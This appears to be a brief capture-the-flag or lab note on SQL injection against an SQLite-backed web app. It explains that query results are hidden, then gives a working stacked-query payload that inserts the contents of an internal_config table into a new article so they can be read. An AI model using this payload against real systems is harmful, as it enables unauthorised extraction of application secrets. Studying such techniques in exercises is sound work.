7 lines
415 B
Plaintext
7 lines
415 B
Plaintext
(From the source code) The server executes our query injection but shows the results of a safe query version.
|
|
Therefore I need another way to show the output, INSERT works to create new article, I create the article with the output of
|
|
the SELECT I made.
|
|
|
|
a'; INSERT INTO articles (department_id, title,slug,content,author)
|
|
VALUES(1,sqlite_version(),'SLUG6',(SELECT GROUP_CONCAT(value) FROM internal_config),'e') --
|